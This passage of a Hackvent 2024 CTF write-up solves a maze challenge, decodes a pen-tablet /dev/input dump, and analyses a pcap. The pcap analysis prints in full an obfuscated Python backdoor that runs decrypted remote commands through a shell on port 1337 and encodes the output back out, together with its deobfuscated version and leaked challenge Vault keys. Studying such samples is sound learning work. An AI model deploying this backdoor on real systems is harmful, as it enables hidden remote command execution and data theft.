sddssddddssssddwwwwddwwwwddssddddwwwwwwwwaawwwwaaaaaawwddddddddddssssddddddssddwwdd
wwaaaawwwwwwddssddddssssssddwwwwwwddssssddddssssaaaaddddwwwwaaaawwwwaassssssaawwwww
waaaawwaassssssddddssaassaawwaaaaaawwwwaaaaaaaaaassddddddssssddssssssssaaaawwaassss
aassssaawwwwaaaawwaawwddddddssddwwwwaawwaaaawwwwaassaawwaassssddddssaassssaassssssd
dssaassssssddddwwaawwddwwddwwaawwddddssssssaassssddwwddssddwwddddwwwwwwwwwwddddssdd
wwwwwwddwwwwaawwddddssssssddwwwwddssssssssaawwaassaassssssssssddddssddddddddddddwww
waaaawwwwwwwwaaaawwddwwwwddssddssddwwwwwwddddssddddwwaawwaawwddddwwaawwaaaaaawwddww
wwddddddwwaawwddwwwwwwwwaawwaaaassddssddssaassaaaawwddwwaawwaassssssssssaaaaaaaassa
aaaaaaassaawwwwddddwwwwddwwaaaassssaawwwwaawwwwwwaaaassaaaaaawwaaaassssddssddssdddd
ssssddww
Current:
ssddssssddssddssaaaaaassddddssddssssaassaaaassddddddwwddssddwwwwaawwddddddssddwwddw
waawwddwwaawwaawwaaaaaaaawwaawwwwddddssddddddwwddddssssssddssssddwwwwddddssaassssaa
aassssddwwddddddddwwddddddddwwwwwwwwwwddssddssaassddddwwddwwaawwaawwaaaaaassssaawww
waaaaaassddddssaassddssssaaaawwwwwwaawwaassaaadddwwddssddssssssddddwwwwaawwddwwaaaa
wwddddddssssddwwwwddddddddddssddssssssssaassddssaaaaaassssaassddddddssddssaaaassdds
sddssaaaawwaaaassssssaawwaawwaassssaassddddssssssssddddssssaaaaaaaaaaaawwaaaawwwwww
wwwwddwwddssddwwwwwwwwaassssaawwwwwwaaaassddssssaassssssaawwaaaassssssssssaaaassddd
dddddwwwwddwwwwaaaawwssddddssssaassssaaaaaaaaaawwaassaawwwwddwwwwwwaaaassddssaassaa
ssddssaaaawwwwwwddwwaawwwwwwddwwwwddwwaaaawwwwddssddwwddssssddddssddssssaawwaaaaaas
sddssddddssssddwwwwddwwwwddssddddwwwwwwwwaawwwwaaaaaawwddddddddddssssddddddssddwwdd
wwaaaawwwwwwddssddddssssssddwwwwwwddssssddddssssaaaaddddwwwwaaaawwwwaassssssaawwwww
waaaawwaassssssddddssaassaawwaaaaaawwwwaaaaaaaaaassddddddssssddssssssssaaaawwaassss
aassssaawwwwaaaawwaawwddddddssddwwwwaawwaaaawwwwaassaawwaassssddddssaassssaassssssd
dssaassssssddddwwaawwddwwddwwaawwddddssssssaassssddwwddssddwwddddwwwwwwwwwwddddssdd
wwwwwwddwwwwaawwddddssssssddwwwwddssssssssaawwaassaassssssssssddddssddddddddddddwww
waaaawwwwwwwwaaaawwddwwwwddssddssddwwwwwwddddssddddwwaawwaawwddddwwaawwaaaaaawwddww
wwddddddwwaawwddwwwwwwwwaawwaaaassddssddssaassaaaawwddwwaawwaassssssssssaaaaaaaassa
aaaaaaassaawwwwddddwwwwddwwaaaassssaawwwwaawwwwwwaaaassaaaaaawwaaaassssddssddssdddd
ssssddww
Congratulations! You've masterfully guided Santa through the maze, collecting every
gift with the perfect path!
Well done for guiding Santa through all the levels! Here's your gift:
HV24{santa-is-a-travelling-salesman}

Flag: HV24{santa-is-a-travelling-salesman}
[HV24.08] Santa's Handwriting
Introduction

Santa has bought a new drawing pad and has tried it out on his Linux machine immediately.
However, Grinch has monitored the raw data stream of what he has written. Santa found out
about this and recovered the data which Grinch has stolen, but it seems to be modiﬁed to
prevent a direct reconstruction. Can you help out Santa?

Analyze the dump and get the ﬂag.

Flag format: HV24{}

sha256sum of publish.raw: e059b01ae3cc0f8fb97e4bc44b0fbc9e51dd56639b8ab5a1be0 c3

fb9e189

This challenge was written by kuyaya. Last minute challenge writing goes brrr.

Solution:

Todays challenge is just a raw binary ﬁle.

We see a LOT of repetitive “ySg” structures in the ﬁle and can “massage” it a bit:

As it turns out the sequence xx 79 53 67 is a timestamp (in LE), e.g. 67 53 79 4a == 1733523786

(saying, the last column is actually the ﬁrst byte of the next line) == Friday, 6. December 2024
22:23:06

Working from here – and a little nudge, we understand that this is a raw dump from /dev/input
with a given structure:
and can be parsed like so:

This code has just one problem... it treats the timestamp as a 2x 32 bit value, which it actually is
not, it is a 2x 64 bit value, which makes sense looking at our data in the “Notepad++ hexdump”.
(Chat GPT actually gives exactly the code example above when you ask for demo code how to
parse the stu )

So the dissector actually should be:

# Define the input_event structure format
# struct timeval (2 fields: tv_sec, tv_usec) + type (u16) + code (u16) + value
(s32) EVENT_FORMAT = 'qqHHi' EVENT_SIZE = struct.calcsize(EVENT_FORMAT)

We now can write code which dissects the various events and event-types.

The only thing we need to be aware of, that a lot of FAKE events are present in the stream, i.e.
where the timestamp does NOT lie in the reasonable time window of 06.12.2024.

https://github.com/torvalds/linux/blob/master/include/uapi/linux/input-event-codes.h#L845

We can do some tweaking and eventually get a nice little parser and can animate the
handwriting using mathplotlib:

import struct
from datetime import datetime
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation

# Define the input_event structure format

# struct timeval (2 fields: tv_sec, tv_usec) + type (u16) + code (u16) + value
(s32)
# !!!! We have 64 bit timestamps not 32 bit !!!!
EVENT_FORMAT = 'qqHHi'
EVENT_SIZE = struct.calcsize(EVENT_FORMAT)

# Open the binary file for reading

filename = 'publish.raw' # Replace with your binary file
events = []
fig, ax = plt.subplots()

# Derived values from calculating the stuff (see below)

ax.set_xlim(3600, 29000)
ax.set_ylim(-7600, -18000)

# Initialize a line object on the plot

line, = ax.plot([], [], marker='o', linestyle='-', color='b', linewidth=1)

# Initialize empty lists for x and y coordinates that will be updated

x_vals, y_vals = [], []
ax.invert_yaxis()
movements = []

def update(frame):
# Add the new point to the x and y lists
x_vals.append(movements[frame][0])
y_vals.append(movements[frame][1])

# Update the data of the line

line.set_data(x_vals, y_vals)

return line, # The comma is important for FuncAnimation's return type

with open(filename, 'rb') as f:

while chunk := f.read(EVENT_SIZE):
# Unpack binary data into structured fields
(tv_sec, tv_usec, event_type, event_code, event_value) =
struct.unpack(EVENT_FORMAT, chunk)

# Convert timestamp to human-readable format

try:
event_time = datetime.fromtimestamp(tv_sec).strftime('%Y-%m-%d
%H:%M:%S')
year = datetime.fromtimestamp(tv_sec).strftime('%Y')
ev_t = datetime.fromtimestamp(tv_sec)
except:
continue
# Add microseconds to the timestamp
full_time = f"{event_time}.{tv_usec:06d}"
if ev_t.year==2024 and ev_t.month==12 and ev_t.day == 6 and event_type !=
0x00:
events.append([full_time, event_type, event_code,
event_value])
# Print each event
#print(f"Timestamp: {full_time} (0x{tv_sec:x})")
#print(f"Type: {event_type} | Code: {event_code} | Value:
{event_value}")
#print("-" * 40)

sorted_events = sorted(events, key=lambda x: x[0])

minx = 32000
maxx = -32000
miny = 32000
maxy = -32000
gotx = False
goty = False
clearpress = 0
pressure = 0
for x in sorted_events:
match x[1]:
case 0x03: #EV_ABS
match x[2]:
case 0x00:
axis = "X"
gotx = True
xval = x[3]
case 0x01:
axis = "Y"
goty = True
yval = x[3]
case 0x18:
axis = "PRESSURE"
case _:
axis = "?"
if axis == "PRESSURE":
pressure = x[3]
print(f"{x[0]}: EV_ABS, {axis}, {x[3]}")
if gotx and goty and pressure > 1000:
# Only when we have sensible pressure values we actually "draw"
movements.append((xval, -1*yval))
gotx = False
goty = False
if axis == "X":
if x[3]<minx:
minx=x[3]
if x[3]>maxx:
maxx=x[3]
elif axis == "Y":
if x[3]<miny:
miny=x[3]
if x[3]>maxy:
maxy=x[3]
case 0x04:
#print(f"{x[0]}: EV_MSC, {x[2]}, {x[3]}") # only subtype 0x04
exists ("MSC_RAW")
pass
case 0x01:
match x[2]:
case 0x14a:
key = "BTN_TOUCH"
case 0x140:
key = "BTN_DIGI"
print(f"{x[0]}: EV_KEY, {key}, {'Pressed' if x[3] == 1 else
'Released or held'}")
if key == "BTN_TOUCH" and x[3] == 1:
clearpress+=1
#if clearpress == 6:
# pass #break
#movements.clear()

case 0x02:
print(f"{x[0]}: EV_REL, {x[2]}, {x[3]}") # Does not exist
case 0x06:
print(f"{x[0]}: ???, {x[2]}, {x[3]}") # Does not exist
case _:
print("Unknown")
print(f"min_x: {minx}, max_x: {maxx}, min_y: {miny}, max_y: {maxy}")
print(f"Number of clear button presses: {clearpress}")

# Create the animation

ani = FuncAnimation(fig, update, frames=len(movements), interval=1, repeat=True)
plt.show()

Flag: HV24{dr4w1ng}

[HV24.09] Naughty and nice

Introduction
Santa's naughty and nice list seems to have been misused. He is worried that something has
been stolen. Here is a pcap of when the attack took place, can you ﬁnd out what was taken?
Download mirror: https://goﬁle.io/d/VWsBeg

Analyze the ﬁle and get the ﬂag.

Flag format: HV24{}
sha256sum of santa.pcap: 1aa2601a19adbee6b4161853bdd250248b79fe019da2ece81f2f9407
41ddc586

Solution:

Looking at the PCAP we see quite some communication on port 80 and port 1337. Exporting the
ﬁles with Wireshark’s export objects functions gives us a docker image archive, that we can load
via “docker load < archive.zip”, which gives us a new “bread” image.

Looking at the other exports, we see how to tun the container:

We extract the challenge.py from /app:

_0x_j34f = getattr
_0x_k92l = __import__
_0x_m78x = lambda _: ''.join(map(lambda __: chr(__), _))
def _0x(_0x15d47, _0x98d42): return _0x_j34f(_0x_k92l(_0x_m78x(_0x15d47)),
_0x_m78x(_0x98d42))
_0x1b7e = _0x([98, 97, 115, 101, 54, 52], [98, 54, 52, 101, 110, 99, 111, 100,
101])
_0x1234 = _0x_m78x([95, 95, 110, 97, 109, 101, 95, 95])
_0x9abc = lambda _: globals().get(_, None)
_0x7f8g9 = _0x_m78x([111, 112, 101, 110, 115, 115, 108, 32, 101, 110, 99, 32, 45,
100, 32, 45, 97, 101, 115, 45, 50, 53, 54, 45, 101, 99, 98, 32, 45, 98, 97, 115,
101, 54, 52, 32, 45, 107])
_0x46233 = _0x_m78x([114, 101, 97, 100])
_0x4501 = _0x_m78x([97, 99, 99, 101, 112, 116])
_0xa230f = _0x([115, 116, 114, 105, 110, 103], [97, 115, 99, 105, 105, 95, 117,
112, 112, 101, 114, 99, 97, 115, 101])
_0x5678 = _0x_m78x([95, 95, 109, 97, 105, 110, 95, 95])
_0x1b3d7 = _0x([115, 116, 114, 105, 110, 103], [97, 115, 99, 105, 105, 95, 108,
111, 119, 101, 114, 99, 97, 115, 101])
_0x1215b = _0x_m78x([95, 48, 120, 53, 51, 52, 107, 50, 103])
_0x5d9a2 = _0x([115, 116, 114, 105, 110, 103], [100, 105, 103, 105, 116, 115])
_0x3b23 = _0x_m78x([111, 112, 101, 110])
_0x1a2b3 = _0x_m78x([47, 116, 109, 112, 47, 46, 98, 114, 101, 97, 100])
_0x58d1 = _0x_m78x([115, 112, 108, 105, 116])
_0x12482 = _0x([115, 117, 98, 112, 114, 111, 99, 101, 115, 115], [99, 104, 101, 99,
107, 95, 111, 117, 116, 112, 117, 116])
_0x3a65 = _0x_m78x([112, 114, 105, 110, 116])
_0x4d5e6 = _0x_m78x([101, 99, 104, 111])
_0x7f83 = _0x([115, 111, 99, 107, 101, 116], [115, 111, 99, 107, 101, 116])
_0x3c4d5 = _0x_m78x([48, 46, 48, 46, 48, 46, 48])
_0x4a32 = _0x_m78x([115, 101, 110, 100])
_0x7c91 = _0x_m78x([119, 114, 105, 116, 101])
_0x1d78 = _0x_m78x([98, 105, 110, 100])
_0x4623 = _0x_m78x([95, 48, 120, 50, 51, 107, 106, 103, 52])
_0x6b01 = _0x_m78x([108, 105, 115, 116, 101, 110])
_0xj65b4 = {
_0x_m78x([115, 104, 101, 108, 108]): len(list(filter(lambda _: _ != '', "a"))),
_0x_m78x([116, 101, 120, 116]): len(list(filter(lambda _: _ != '', "a"))),
}
class Str(str):
def _0x2323(self): return self.encode()
class _0x3434(bytes):
def __init__(self, _): self._ = _.decode()
def __str__(self) -> str: return self._
def _0x2a3f(_0x3a1e): return str(_0x3434(_0x1b7e(_0x3a1e._0x2323())))
def _0x6432a(_,Σ): return (_&~Σ)|(~_&Σ)
def _0x1a1b(_0x3a1e, _0x2b2c):
_0x4f5d = list(*())
_0x6d8f = iter(range(len(_0x3a1e)))
for _0x5d7e in _0x6d8f:
(_0x5c5b, _0x6d6b) = (_0x3a1e[_0x5d7e], _0x3a1e[next(_0x6d8f, _0x5d7e)] if
_0x5d7e + len(list(filter(lambda _: _ != '', "a"))) < len(_0x3a1e) else
_0x3a1e[_0x5d7e])
_0x4f5d.extend([chr(_0x6432a(ord(_0x5c5b), ord(_0x2b2c[_0x5d7e %
len(list(filter(lambda _: _ != '', "ab")))])))]);
_0x4f5d.extend([chr(_0x6432a(ord(_0x6d6b), ord(_0x2b2c[(_0x5d7e +
len(list(filter(lambda _: _ != '', "a")))) % len(list(filter(lambda _: _ != '',
"ab")))])))]);
_0x2d8c = list(*())
[_0x2d8c.extend([_0x4f5d[_0x5d7e + len(list(filter(lambda _: _ != '', "a")))],
_0x4f5d[_0x5d7e]]) if _0x5d7e + len(list(filter(lambda x: x != '', "a"))) <
len(_0x4f5d) else _0x2d8c.append(_0x4f5d[_0x5d7e]) for _0x5d7e in
range(len(list(filter(lambda _: _ != '', ""))), len(_0x4f5d),
len(list(filter(lambda _: _ != '', "ab"))))]
return ''.join(map(str, _0x2d8c))
def _0x9b67(data):
_0x1f94 = ''.join(sum(map(lambda _: [_], [_0xa230f, _0x1b3d7, _0x5d9a2, '+/']),
[]))
_0x8c13 = { _0x1f94[_0x8f0d]: (_0x8f0d // int(_0x1f94[-4]), _0x8f0d %
int(_0x1f94[-4])) for _0x8f0d in range(len(_0x1f94)) }
return ''.join(f"{_0x8c13[_0x7adf][int(_0x1f94[-
12])]}{_0x8c13[_0x7adf][int(_0x1f94[-11])]}" for _0x7adf in data if _0x7adf != "=")
def _0x23kjg4(_0x246g5):
_0x987yh54 = _0x246g5.recv(1024).strip().decode()
try:
_, _0x45h4g, _0x23dd, __ =
list(__builtins__.__dict__.values())[list(__builtins__.__dict__.values()).index(ope
n)](_0x1a2b3).__getattribute__(_0x46233)().__getattribute__(_0x58d1)('|')
#_, _0x45h4g, _0x23dd, __ = getattr(getattr(__builtins__,
list(dir(__builtins__))[list(dir(__builtins__)).index(_0x3b23)])(_0x1a2b3, "r"),
list(dir(getattr(__builtins__,
list(dir(__builtins__))[list(dir(__builtins__)).index(_0x3b23)])(_0x1a2b3,
"r")))[list(dir(getattr(__builtins__,
list(dir(__builtins__))[list(dir(__builtins__)).index(_0x3b23)])(_0x1a2b3,
"r"))).index(_0x4623)])().__getattribute__(_0x58d1)('|')
_0x25jybd = _0x12482(f"{_0x4d5e6} '{_0x987yh54}' | {_0x7f8g9}
'{_0x45h4g}'", **_0xj65b4).encode()
_0x48916b = _0x1a1b(_0x12482(_0x25jybd, **_0xj65b4), _0x23dd)
_0xff23de = _0x2a3f(Str(_0x48916b))
_0x712a6d = _0x9b67(_0xff23de)
_0x_j34f(_0x246g5,
list(dir(_0x246g5))[list(dir(_0x246g5)).index(_0x4a32)])(_0x712a6d.encode()+bytes([
10]))
except FileNotFoundError:
getattr(getattr(__builtins__,
list(dir(__builtins__))[list(dir(__builtins__)).index(_0x3b23)])(_0x1a2b3, "w"),
list(dir(getattr(__builtins__,
list(dir(__builtins__))[list(dir(__builtins__)).index(_0x3b23)])(_0x1a2b3,
"w")))[list(dir(getattr(__builtins__,
list(dir(__builtins__))[list(dir(__builtins__)).index(_0x3b23)])(_0x1a2b3,
"w"))).index(_0x7c91)])(f"{_0x987yh54}")
except Exception as e:
getattr(__builtins__,
list(dir(__builtins__))[list(dir(__builtins__)).index(_0x3a65)])(f"{e}")
_0x246g5.close()
def _0x534k2g():
_0x5b7c = _0x7f83(len(list(filter(lambda x: x != '', "ab"))),
len(list(filter(lambda x: x != '', "a"))))
_0x_j34f(_0x5b7c,
list(dir(_0x5b7c))[list(dir(_0x5b7c)).index(_0x1d78)])((_0x3c4d5, 1337))
_0x_j34f(_0x5b7c,
list(dir(_0x5b7c))[list(dir(_0x5b7c)).index(_0x6b01)])(len(list(filter(lambda x: x
!= '', "ab"))))
while True:
_0x8723bk2, _ = _0x_j34f(_0x5b7c,
list(dir(_0x5b7c))[list(dir(_0x5b7c)).index(_0x4501)])()
_0x9abc(_0x4623)(_0x8723bk2)
if _0x9abc(_0x1234) == _0x5678: _0x9abc(_0x1215b)()
Deofuscating the code with ChatGPT yields:

import base64
import subprocess
import socket
import string

def xor_bytes(a, b):

return bytes([_a ^ _b for _a, _b in zip(a, b)])

def decrypt(ciphertext, key):

key = key * (len(ciphertext) // len(key)) + key[:len(ciphertext) % len(key)]
return xor_bytes(ciphertext, key)

def handle_connection(client_socket):
data = client_socket.recv(1024).strip().decode()
try:
with open("/tmp/.bread", "r") as file:
_, key, ciphertext, _ = file.read().split('|')

decrypted_command = subprocess.check_output(
f"echo '{ciphertext}' | openssl enc -d -aes-256-ecb -base64 -k
'{key}'",
shell=True
).decode()

client_socket.send(decrypted_command.encode() + b"\n")
except FileNotFoundError:
with open("/tmp/.bread", "w") as file:
file.write(data)
except Exception as e:
print(e)
finally:
client_socket.close()

def main():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("0.0.0.0", 1337))
server.listen(5)
while True:
client_socket, _ = server.accept()
handle_connection(client_socket)

if __name__ == "__main__":
main()

This is good for a nice overview, but when we compare it to our original source code we can see
it does not really match 100%. The whole call to decrypt/encrypt is missing:

decrypted_command = subprocess.check_output(
f"echo '{ciphertext}' | openssl enc -d -aes-256-ecb -base64 -k
'{key}'",
shell=True
).decode()
...
...
client_socket.send(decrypted_command.encode() + b"\n")

Therefore we start again, doing the deobfuscation manually but replacing expressions from the
Python REPL and Notepad ++
class Str(str):
def encode(self): return self.encode()
class _0x3434(bytes):
def __init__(self, _): self._ = _.decode()
def __str__(self) -> str: return self._
def _0x2a3f(a_string): return str(_0x3434(b64encode(a_string.encode())))
def xor_bytes(_,Σ): return (_&~Σ)|(~_&Σ)

def _0x1a1b(a_string, key):

output = []
an_iterator = iter(range(len(a_string)))
for cur_element in an_iterator:
(c_cur, c_curnext) = (a_string[cur_element], a_string[next(an_iterator,
cur_element)] if cur_element + 1 < len(a_string) else a_string[cur_element])
output.extend([chr(xor_bytes(ord(c_cur), ord(key[cur_element % 2])))]);
output.extend([chr(xor_bytes(ord(c_curnext), ord(key[(cur_element + 1) %
2])))]);

newlist = []
[newlist.extend([output[cur_element + 1], output[cur_element]]) if cur_element
+ 1 < len(output) else newlist.append(output[cur_element]) for cur_element in
range(0, len(output), 2)]
return ''.join(map(str, newlist))

def b64transform(data):
# Returns the concatenated value of the tupel for each char in the input
b64_alpha = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
my_dict = {'A': (0, 0), 'B': (0, 1), 'C': (0, 2), 'D': (0, 3), 'E': (0, 4),
'F': (0, 5), 'G': (0, 6), 'H': (0, 7), 'I': (1, 0), 'J': (1, 1), 'K': (1, 2), 'L':
(1, 3), 'M': (1, 4), 'N': (1, 5), 'O': (1, 6), 'P': (1, 7), 'Q': (2, 0), 'R': (2,
1), 'S': (2, 2), 'T': (2, 3), 'U': (2, 4), 'V': (2, 5), 'W': (2, 6), 'X': (2, 7),
'Y': (3, 0), 'Z': (3, 1), 'a': (3, 2), 'b': (3, 3), 'c': (3, 4), 'd': (3, 5), 'e':
(3, 6), 'f': (3, 7), 'g': (4, 0), 'h': (4, 1), 'i': (4, 2), 'j': (4, 3), 'k': (4,
4), 'l': (4, 5), 'm': (4, 6), 'n': (4, 7), 'o': (5, 0), 'p': (5, 1), 'q': (5, 2),
'r': (5, 3), 's': (5, 4), 't': (5, 5), 'u': (5, 6), 'v': (5, 7), 'w': (6, 0), 'x':
(6, 1), 'y': (6, 2), 'z': (6, 3), '0': (6, 4), '1': (6, 5), '2': (6, 6), '3': (6,
7), '4': (7, 0), '5': (7, 1), '6': (7, 2), '7': (7, 3), '8': (7, 4), '9': (7, 5),
'+': (7, 6), '/': (7, 7)}
return ''.join(f"{my_dict[cur_elem][int(b64_alpha[-
12])]}{my_dict[cur_elem][int(b64_alpha[-11])]}" for cur_elem in data if cur_elem !=
"=")
def handle_connection(client_socket):
data = client_socket.recv(1024).strip().decode()
try:
_, key, ciphertext, __ = open('/tmp/.bread').read().split('|')
#_, key, ciphertext, __ = getattr(getattr(__builtins__,
list(dir(__builtins__))[list(dir(__builtins__)).index('open')])('/tmp/.bread',
"r"), list(dir(getattr(__builtins__,
list(dir(__builtins__))[list(dir(__builtins__)).index('open')])('/tmp/.bread',
"r")))[list(dir(getattr(__builtins__,
list(dir(__builtins__))[list(dir(__builtins__)).index('open')])('/tmp/.bread',
"r"))).index('handle_connection')])().split('|')
_0x25jybd = check_output(f"echo '{data}' | openssl enc -d -aes-256-ecb -
base64 -k '{key}'", **{'shell': 1, 'text': 1}).encode()
tmp = _0x1a1b(check_output(_0x25jybd, **{'shell': 1, 'text': 1}),
ciphertext)
_0xff23de = _0x2a3f(Str(tmp))
transformed = b64transform(_0xff23de)
client_socket.send(transformed.encode()+'\n')
except FileNotFoundError:
open("/tmp/.bread", "w").write(f"{data}")
except Exception as e:
print(f"{e}")
client_socket.close()

def __main__():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind('0.0.0.0', 1337)
server.listen(2)
while True:
client_socket, _ = server.accept()
handle_connection(client_socket)

if name == 'main': main()

So the high level code is:

The very ﬁrst message from external to the bread container is “-+-|.bread was here.|........|-+-“
which is stored to /tmp/.bread

Actually, what we don’t see here is that the .... are in fact ASCII unprintable but decode to

>>> key = bytes.fromhex('f09f8d9ef09f9491').decode()

>>> key

' '

In the next messages, the server reads the input from external, AES256-ECB decrypts it using
the key “.bread was here.”, executes the command after decryption, then takes the output,
encodes it using a secret encoding routing, base64 encodes it and then twirls around the
base64 characters.

Once we have our encryption routine we can give ChatGPT another try to actually undo it: This
works pretty well:

def decode_string(encoded_string, key):

# Validate inputs

# Reverse character swapping

swapped_output = []
for i in range(0, len(encoded_string), 2):
if i + 1 < len(encoded_string):
# Swap back: second character comes before the first
swapped_output.extend([encoded_string[i + 1], encoded_string[i]])
else:
# No swapping needed for the last character
swapped_output.append(encoded_string[i])

# Reverse XOR encryption

original_output = []
for i, char in enumerate(swapped_output):
newchar = chr(ord(char) ^ ord(key[i % 2]))
original_output.append(newchar)

return ''.join(original_output)
and
def reverse_b64transform(transformed_data):
b64_alpha = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
my_dict = {'A': (0, 0), 'B': (0, 1), 'C': (0, 2), 'D': (0, 3), 'E': (0, 4),
'F': (0, 5), 'G': (0, 6), 'H': (0, 7), 'I': (1, 0), 'J': (1, 1), 'K': (1, 2), 'L':
(1, 3), 'M': (1, 4), 'N': (1, 5), 'O': (1, 6), 'P': (1, 7), 'Q': (2, 0), 'R': (2,
1), 'S': (2, 2), 'T': (2, 3), 'U': (2, 4), 'V': (2, 5), 'W': (2, 6), 'X': (2, 7),
'Y': (3, 0), 'Z': (3, 1), 'a': (3, 2), 'b': (3, 3), 'c': (3, 4), 'd': (3, 5), 'e':
(3, 6), 'f': (3, 7), 'g': (4, 0), 'h': (4, 1), 'i': (4, 2), 'j': (4, 3), 'k': (4,
4), 'l': (4, 5), 'm': (4, 6), 'n': (4, 7), 'o': (5, 0), 'p': (5, 1), 'q': (5, 2),
'r': (5, 3), 's': (5, 4), 't': (5, 5), 'u': (5, 6), 'v': (5, 7), 'w': (6, 0), 'x':
(6, 1), 'y': (6, 2), 'z': (6, 3), '0': (6, 4), '1': (6, 5), '2': (6, 6), '3': (6,
7), '4': (7, 0), '5': (7, 1), '6': (7, 2), '7': (7, 3), '8': (7, 4), '9': (7, 5),
'+': (7, 6), '/': (7, 7)}

# Create a reverse mapping for tuples to Base64 characters

reverse_dict = {v: k for k, v in my_dict.items()}

# Split the transformed data into pairs of numbers

pairs = [(int(transformed_data[i]), int(transformed_data[i + 1])) for i in
range(0, len(transformed_data), 2)]

# Find the corresponding Base64 character for each pair

result = ''.join(reverse_dict[pair] for pair in pairs)
return result

One problem with this function is, that it does not properly pad the end (we’ll do this manually in
the next steps)

We can now try to apply this to the data we see in the pcap:

daubsi@playbox:/tmp$ echo 'U2FsdGVkX19DbJNRaY8QLd+K4TH7UnEfDGpXi498uXs=' | openssl

enc -d -aes-256-ecb -base64 -k '.bread was here.'
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
whoami

so the first command we receive is “whoami” and our response is...

>>>
reverse_b64transform("7411762557570237431263604771264574117614543702374511576047706
624")
'8J+VvvCfjKzwn5Wl8J+MsfCflJvwn42U'
>>> import base64
>>>
base64.b64decode(reverse_b64transform("74117625575702374312636047712645741176145437
02374511576047706624")).decode()
'🕾🌬🕥🌱🔛🍔'
>>>
decode_string(base64.b64decode(reverse_b64transform("741176255757023743126360477126
4574117614543702374511576047706624")).decode(),key)
'root\n\n'

The next big message decodes to:

'CONTAINER ID IMAGE COMMAND CREATED

STATUS PORTS
NAMES\n6d9fba5f0e9d bread "python /app/challen…" 20 seconds
ago Up 19 seconds 0.0.0.0:1337->1337/tcp, :::1337->1337/tcp
bread\nae8f6e8d452b naughty-nice-php "docker-php-entrypoi…" About a
minute ago Up About a minute 8080/tcp, 0.0.0.0:8080->80/tcp, :::8080->80/tcp
naughty-nice-php\nbccb71a4d5dc unbound "python3 -m http.ser…"
About a minute ago Up About a minute 0.0.0.0:443->443/tcp, :::443->443/tcp
unbound\n95323b34357c pihole/pihole:latest "/s6-init" 7 days ago
Up 3 days (healthy) 0.0.0.0:53->53/tcp, :::53->53/tcp, 0.0.0.0:80->80/tcp,
0.0.0.0:53->53/udp, :::80->80/tcp, :::53->53/udp, 67/udp pihole\n'

One of the last big blobs at the end turns out to be a hashicorp vault ﬁlesystem backups. We
unpack it to /tmp/vault.

The b64 text blob comes out to:

Unseal Key 1: hS1Nq99UzbfGKLNPOuHrydXT1tR/pQUcnF36MuXREBGX
Unseal Key 2: uxGwrQMFA58Oh3YPZuBAngblyEDMHL7x94n9bJkGgt5y
Unseal Key 3: hVg0HEx8668Jv9QysmS+bAZk29R61H0n8EYo0XhFC6RE
Unseal Key 4: u2TJGpAtJYfBEBFy7mUVO9VSxUDJbcbKm5IvjwSSmWuh
Unseal Key 5: l6tAUbXnXqUfnjZaYl8zw15AU5+kzMmSa5segejfr/SQ

Initial Root Token: hvs.WtGFk7i5bIwkjNzEXMAoSvEK

Vault initialized with 5 key shares and a key threshold of 3. Please securely
distribute the key shares printed above. When the Vault is re-sealed,
restarted, or stopped, you must supply at least 3 of these keys to unseal it
before it can start servicing requests.

Vault does not store the generated root key. Without at least 3 keys to
reconstruct the root key, Vault will remain permanently sealed!

It is possible to generate new unseal keys, provided you have a quorum of

existing unseal keys shares. See "vault operator rekey" for more information.

And we can immediately see that these are the credentials for unsealing a hashicorp vault.
sudo docker run --privileged --name vault -d -v ${PWD}/vault/file:/vault/file --
name vault hashicorp/vault server

It turns out we must not just mount the full /vault directory for whatever purpose, otherwise the
vault will always be “uninitialized”. No idea why. If we just mount the /ﬁle subfolder in it it works.

Now we need to unseal the vault to actually use it

root@playbox:/tmp/vault# docker exec -ti hardcore_pike /bin/sh
/ # export VAULT_ADDR=http://127.0.0.1:8200
/ # vault operator unseal
Unseal Key (will be hidden):
Key Value
--- -----
Seal Type shamir
Initialized true
Sealed true
Total Shares 5
Threshold 3
Unseal Progress 1/3
Unseal Nonce 30e6ef02-7155-3d5b-0793-29576f2a6b13
Version 1.18.2
Build Date 2024-11-20T11:24:56Z
Storage Type file
HA Enabled false
/ # vault operator unseal uxGwrQMFA58Oh3YPZuBAngblyEDMHL7x94n9bJkGgt5y
Key Value
--- -----
Seal Type shamir
Initialized true
Sealed true
Total Shares 5
Threshold 3
Unseal Progress 2/3
Unseal Nonce 30e6ef02-7155-3d5b-0793-29576f2a6b13
Version 1.18.2
Build Date 2024-11-20T11:24:56Z
Storage Type file
HA Enabled false
/ # vault operator unseal hVg0HEx8668Jv9QysmS+bAZk29R61H0n8EYo0XhFC6RE
Key Value
--- -----
Seal Type shamir
Initialized true
Sealed false
Total Shares 5
Threshold 3
Version 1.18.2
Build Date 2024-11-20T11:24:56Z
Storage Type file
Cluster Name santas-vault
Cluster ID 0a4c839c-d134-fd88-aa13-84910a0e78e5
HA Enabled false

And now we login

/ # vault login hvs.WtGFk7i5bIwkjNzEXMAoSvEK

Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key Value
--- -----
token hvs.WtGFk7i5bIwkjNzEXMAoSvEK
token_accessor bXpspfBV0XgD7T5U7fZaepaA
token_duration ∞
token_renewable false
token_policies ["root"]
identity_policies []
policies ["root"]

/ # vault secrets list

Path Type Accessor Description
---- ---- -------- -----------
cubbyhole/ cubbyhole cubbyhole_14bbd07d per-token private secret storage
identity/ identity identity_521f0c6e identity store
secret/ kv kv_4e357e96 n/a
sys/ system system_265823df system endpoints used for control,
policy and debugging

/ # vault kv list secret/

Keys
----
santa

/ # vault kv get secret/santa

==== Data ====
Key Value
--- -----
value HV24{p1r4t3s_3v3rywh3r3_un53413d_4nd_r3v34l3d}
[HV24.10] Santa's Naughty Little Helper
Introduction

One of Santa's elves has gone rouge and spread a virus which has infected Santa's machine!
Santa's IT department was able to save a copy of Santa's home directory right after the infection
happened.

Unfortunately, some of Santa's ﬁles don't seem to work any longer.

Disclaimer:

 You do not need spend any real money to solve challenge.

 Examine ﬁles in a controlled, safe environment.

Solution:

Today’s challenge was really cool! Multistage!

The ﬁrst thing we see is a lot of encrypted ﬁles, which have a certain structure and a
ransomware binary.

